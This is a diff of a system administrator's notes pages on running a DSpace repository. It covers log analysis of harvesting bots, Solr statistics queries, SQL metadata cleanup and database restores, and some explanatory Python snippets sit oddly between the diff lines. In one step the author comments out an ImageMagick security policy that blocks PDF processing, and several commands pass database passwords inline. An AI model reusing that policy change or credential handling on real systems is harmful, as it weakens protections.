    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
     7
    -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
    +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
     2
     
    • So I’m not sure what’s going on
    • @@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • There are some example queries on the DSpace Solr wiki
    • For example, this query returns 1655 rows for item 10568/10630:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false'
     
    • The id in the Solr query is the item’s database id (get it from the REST API or something)
    • Next, I adapted a query to get the downloads and it shows 889, which is similar to the number Atmire’s statlet shows, though the query logic here is confusing:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
     
    • According to the SolrQuerySyntax page on the Apache wiki, the [* TO *] syntax just selects a range (in this case all values for a field)
    • So it seems to be: @@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • What the shit, I think I’m right: the simplified logic in this query returns the same 889:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
     
    • And if I simplify the statistics_type logic the same way, it still returns the same 889!
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view'
     
    • As for item views, I suppose that’s just the same query, minus the bundleName:ORIGINAL:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-bundleName:ORIGINAL&fq=statistics_type:view'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-bundleName:ORIGINAL&fq=statistics_type:view'
     
    • That one returns 766, which is exactly 1655 minus 889…
    • Also, Solr’s fq is similar to the regular q query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries
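The simplified view and download queries above can be sketched in Python. This is only an illustration under stated assumptions: the function name `build_stats_url` is hypothetical, the endpoint is the local Solr URL from the commands above, and the filters are the simplified ones that happened to return the same counts for this item (they are not guaranteed to be equivalent to the double-negated originals for every item).

```python
from urllib.parse import urlencode

# Local Solr statistics core, as used in the http commands above
SOLR_SELECT = "http://localhost:3000/solr/statistics/select"


def build_stats_url(item_id, downloads):
    """Build a Solr select URL that counts views or downloads for one item.

    Hypothetical helper: downloads are hits in the ORIGINAL bundle,
    views are hits outside of it.
    """
    bundle_filter = "bundleName:ORIGINAL" if downloads else "-bundleName:ORIGINAL"
    params = [
        ("indent", "on"),
        ("rows", "0"),  # we only want numFound, not the documents
        ("q", f"type:0 owningItem:{item_id}"),
        ("fq", "isBot:false"),
        ("fq", bundle_filter),
        ("fq", "statistics_type:view"),
    ]
    return f"{SOLR_SELECT}?{urlencode(params)}"


if __name__ == "__main__":
    print(build_stats_url(11576, downloads=True))
    print(build_stats_url(11576, downloads=False))
```

Each `fq` is passed as a separate parameter so that Solr can cache the filters independently.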
    • @@ -432,11 +432,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • It uses the Python-based Falcon web framework and talks to Solr directly using the SolrClient library (which seems to have issues in Python 3.7 currently)
    • After deploying on DSpace Test I can then get the stats for an item using its ID:
    -
    $ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
    +
    $ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
     {
    -    "downloads": 2,
    -    "id": 110988,
    -    "views": 15
    +    "downloads": 2,
    +    "id": 110988,
    +    "views": 15
     }
     
    • The numbers are different than those that come from Atmire’s statlets for some reason, but as I’m querying Solr directly, I have no idea where their numbers come from!
    • @@ -533,7 +533,7 @@ sqlite> INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
      # python3
       Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
       [GCC 5.4.0 20160609] on linux
      -Type "help", "copyright", "credits" or "license" for more information.
      +Type "help", "copyright", "credits" or "license" for more information.
       >>> import sqlite3
       >>> print(sqlite3.sqlite_version)
       3.24.0
      @@ -606,7 +606,7 @@ Indexing item downloads (page 260 of 260)
       
    • I will have to keep an eye on that over the next few weeks to see if things stay as they are
    • I did a batch replacement of the access rights with my fix-metadata-values.py script on DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
    +
    $ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
     
    • This changes “Open Access” to “Unrestricted Access” and “Limited Access” to “Restricted Access”
    • After that I did a full Discovery reindex:
    • @@ -629,7 +629,7 @@ sys 2m18.485s
    • Linode emailed to say that CGSpace’s (linode19) CPU load was high for a few hours last night
    • Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "26/Sep/2018:(19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "26/Sep/2018:(19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         295 34.218.226.147
         296 66.249.64.95
         350 157.55.39.185
    @@ -645,9 +645,9 @@ sys     2m18.485s
     
  • 68.6.87.12 is on Cox Communications in the US (?)
  • These hosts are not using proper user agents and are not re-using their Tomcat sessions:
  • -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
     5423
    -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
    +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
     758
     
    • I will add their IPs to the list of bad bots in nginx so we can add a “bot” user agent to them and let Tomcat’s Crawler Session Manager Valve handle them
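Note that `grep -c` prints the number of matching log lines, so the counts above are hits rather than distinct sessions. A minimal Python sketch for counting distinct session IDs per IP could look like the following. It assumes the `session_id=...:ip_addr=...` layout matched by the grep patterns above; the function name `unique_sessions_per_ip` is hypothetical.

```python
import re
from collections import defaultdict

# Same shape as the grep pattern above: a 32-character session ID followed by the client IP
SESSION_RE = re.compile(
    r"session_id=([A-Z0-9]{32}):ip_addr=(\d{1,3}(?:\.\d{1,3}){3})"
)


def unique_sessions_per_ip(lines):
    """Return a dict mapping each IP address to its number of distinct session IDs."""
    sessions = defaultdict(set)
    for line in lines:
        match = SESSION_RE.search(line)
        if match:
            session_id, ip_addr = match.groups()
            sessions[ip_addr].add(session_id)
    return {ip: len(ids) for ip, ids in sessions.items()}


if __name__ == "__main__":
    # Log file name taken from the commands above
    with open("dspace.log.2018-09-26", encoding="utf-8", errors="replace") as log:
        for ip, count in sorted(unique_sessions_per_ip(log).items(), key=lambda kv: kv[1]):
            print(f"{count:7d} {ip}")
```

A client that re-uses its session properly should show a small number here even when it makes thousands of requests.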
    • @@ -659,8 +659,8 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
    • Peter sent me a list of 43 author names to fix, but it had some encoding errors like Belalcázar, John like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)
    • I did batch replaces for both on CGSpace with my fix-metadata-values.py script:
    -
    $ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    +
    $ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
     
    • Afterwards I started a full Discovery re-index:
    @@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
  • Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc
  • I think I should just batch export and update all languages…
  • -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
     
    • Then I can simply delete the “Other” and “other” ones because that’s not useful at all:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
     DELETE 6
    -dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
    +dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
     DELETE 79
     
    • Looking through the list I see some weird language codes like gh, so I checked out those items:
    -
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
      resource_id
     -------------
            94530
    @@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
     
    • Those items are from Ghana, so the submitter apparently thought gh was a language… I can safely delete them:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
     DELETE 2
     
    • The next issue would be jn:
    -
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    +
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
      resource_id
     -------------
            94001
    @@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
     
  • Those items are about Japan, so I will update them to be ja
  • Other replacements:
  • -
    DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    -UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
    -UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
    +
    DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
    +UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
     
    • Then there are 12 items with en|hi, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata
    diff --git a/docs/2018-10/index.html b/docs/2018-10/index.html index d9a54f307..86515baf7 100644 --- a/docs/2018-10/index.html +++ b/docs/2018-10/index.html @@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now "/> - + @@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai
    • I see Moayad was busy collecting item views and downloads from CGSpace yesterday:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         933 40.77.167.90
         971 95.108.181.88
        1043 41.204.190.40
    @@ -135,13 +135,13 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai
     
    • Of those, about 20% were HTTP 500 responses (!):
    -
    $ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
    +
    $ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
      118927 200
       31435 500
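The share of each status code can be worked out from the `uniq -c` output above. A small sketch, where the helper name `status_shares` is hypothetical:

```python
def status_shares(uniq_c_output):
    """Turn `uniq -c` style lines ("<count> <status>") into fractions of the total."""
    counts = {}
    for line in uniq_c_output.strip().splitlines():
        count, status = line.split()
        counts[status] = int(count)
    total = sum(counts.values())
    return {status: n / total for status, n in counts.items()}


if __name__ == "__main__":
    shares = status_shares("118927 200\n 31435 500\n")
    for status, share in shares.items():
        print(f"{status}: {share:.1%}")
```

With the counts above, 31435 of 150362 requests were HTTP 500, which is about 20.9%.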
     
    • I added Phil Thornton and Sonal Henson’s ORCID identifiers to the controlled vocabulary for cg.creator.orcid and then re-generated the names using my resolve-orcids.py script:
    -
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > 2018-10-03-orcids.txt
    +
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > 2018-10-03-orcids.txt
     $ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
     
    • I found a new corner case error that I need to check, given and family names deactivated:
    • @@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • Linode sent another alert about CPU usage on CGSpace (linode18) this evening
    • It seems that Moayad is making quite a lot of requests today:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1594 157.55.39.160
        1627 157.55.39.173
        1774 136.243.6.84
    @@ -169,13 +169,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
     
  • But in super positive news, he says they are using my new dspace-statistics-api and it’s MUCH faster than using Atmire CUA’s internal “restlet” API
  • I don’t recognize the 138.201.49.199 IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:
  • -
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
    +
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
        8324 GET /bitstream
        4193 GET /handle
     
    • Suspiciously, it’s only grabbing the CGIAR System Office community (handle prefix 10947):
    -
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
    +
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
           7 GET /handle/10568
        4186 GET /handle/10947
     
      @@ -187,19 +187,19 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • I looked in Solr’s statistics core and these hits were actually all counted as isBot:false (of course)… hmmm
    • I tagged all of Sonal and Phil’s items with their ORCID identifiers on CGSpace using my add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • Where 2018-10-03-add-orcids.csv contained:
    dc.contributor.author,cg.creator.id
    -"Henson, Sonal P.",Sonal Henson: 0000-0002-2002-5462
    -"Henson, S.",Sonal Henson: 0000-0002-2002-5462
    -"Thornton, P.K.",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Philip K",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phil",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Philip K.",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phillip",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phillip K.",Philip Thornton: 0000-0002-1854-0182
    +"Henson, Sonal P.",Sonal Henson: 0000-0002-2002-5462
    +"Henson, S.",Sonal Henson: 0000-0002-2002-5462
    +"Thornton, P.K.",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Philip K",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phil",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Philip K.",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phillip",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phillip K.",Philip Thornton: 0000-0002-1854-0182
     

    2018-10-04

    • Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)
    • @@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • So it’s fixed, but I’m not sure why!
    • Peter wants to know the number of API requests per month, which was about 250,000 in September (excluding statlet requests):
    -
    # zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
    +
    # zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
     251226
     
    • I found a logic error in the dspace-statistics-api indexer.py script that was causing item views to be inserted into downloads
    • @@ -243,7 +243,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • When I tried to force them to be generated I got an error that I’ve never seen before:
    $ dspace filter-media -v -f -i 10568/97613
    -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
    +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
     
    • I see there was an update to Ubuntu’s ImageMagick on 2018-10-05, so maybe something changed or broke?
    • I get the same error when forcing filter-media to run on DSpace Test too, so it’s gotta be an ImageMagick bug
    • @@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
    • Wow, someone on Twitter posted about this breaking his web application (and it was retweeted by the ImageMagick account!)
    • I commented out the line that disables PDF thumbnails in /etc/ImageMagick-6/policy.xml:
    -
      <!--<policy domain="coder" rights="none" pattern="PDF" />-->
    +
      <!--<policy domain="coder" rights="none" pattern="PDF" />-->
     
    • This works, but I’m not sure what ImageMagick’s long-term plan is if they are going to disable ALL image formats…
    • I suppose I need to enable a workaround for this in Ansible?
    @@ -274,9 +274,9 @@ $ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volume
     $ sudo podman start dspacedb
     $ createuser -h localhost -U postgres --pwprompt dspacetest
     $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
     $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
    -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
    +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
     $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository
    • @@ -311,7 +311,7 @@ COPY 10000
    • Then I exported and applied them on my local test server:
    -
    $ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
    +
    $ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
     
    • I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay’s author controlled vocabulary
    @@ -321,7 +321,7 @@ COPY 10000
  • Switch to new CGIAR LDAP server on CGSpace, as it’s been running (at least for authentication) on DSpace Test for the last few weeks, and I think the old one will be deprecated soon (today?)
  • Apply Peter’s 746 author corrections on CGSpace and DSpace Test using my fix-metadata-values.py script:
  • -
    $ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
     
    • Run all system updates on CGSpace (linode19) and reboot the server
    • After rebooting the server I noticed that Handles are not resolving, and the dspace-handle-server systemd service is not running (or rather, it exited with success)
    • @@ -356,20 +356,20 @@ COPY 10000 $ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'

    2018-10-16

    • Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:
    -
    dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
    +
    dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
     
    • Talking to the CodeObia guys about the REST API I started to wonder why it’s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it
    • Interestingly, the speed doesn’t get better after you request the same thing multiple times–it’s consistently bad on both CGSpace and DSpace Test!
    -
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.35s user 0.06s system 1% cpu 25.133 total
     0.31s user 0.04s system 1% cpu 25.223 total
    @@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
     0.20s user 0.05s system 1% cpu 23.838 total
     0.30s user 0.05s system 1% cpu 24.301 total
     
    -$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.22s user 0.03s system 1% cpu 17.248 total
     0.23s user 0.02s system 1% cpu 16.856 total
    @@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
  • I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?
  • I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!
  • -
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.20s user 0.03s system 0% cpu 25.017 total
     0.23s user 0.02s system 1% cpu 23.299 total
    @@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
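    • A rough Python sketch for comparing runs like the ones above: it pulls the wall-clock "total" value out of zsh-style `time` summaries and averages them. The helper name `wall_clock_seconds` is hypothetical, and the sample text is just the two CGSpace lines shown earlier:

```python
import re
from statistics import mean

# Matches the wall-clock figure in zsh-style `time` output, e.g.
# "0.35s user 0.06s system 1% cpu 25.133 total"
TOTAL_RE = re.compile(r"cpu\s+([0-9.]+)\s+total")


def wall_clock_seconds(time_output: str) -> list[float]:
    """Return every 'total' value found in the pasted `time` output."""
    return [float(m.group(1)) for m in TOTAL_RE.finditer(time_output)]


# Two of the CGSpace samples from the notes above
cgspace = """
0.35s user 0.06s system 1% cpu 25.133 total
0.31s user 0.04s system 1% cpu 25.223 total
"""

samples = wall_clock_seconds(cgspace)
print(f"n={len(samples)} mean={mean(samples):.3f}s")
```

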